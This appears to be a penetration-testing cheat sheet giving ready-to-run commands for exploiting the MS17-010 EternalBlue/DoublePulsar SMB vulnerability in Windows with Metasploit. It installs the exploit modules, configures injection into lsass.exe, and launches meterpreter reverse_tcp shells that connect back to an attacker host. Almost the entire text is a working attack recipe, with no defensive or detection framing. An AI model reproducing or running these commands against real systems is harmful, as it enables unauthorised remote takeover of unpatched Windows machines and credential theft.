I. Eternalblue-Doublepulsar-Metasploit

## Recommended
apt-get install wine32
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
cd Eternalblue-Doublepulsar-Metasploit
cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

msfconsole
search eternalblue

use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE x64
set rhost 192.168.1.105
set target 9
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.104
exploit

II. Metasploit module

wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb
cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb

gem install ruby_smb # install the ruby_smb module
msfupdate
msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.1.8
set lhost 192.168.1.21
set payload windows/x64/meterpreter/reverse_tcp
exploit

Categories: Intranet penetration
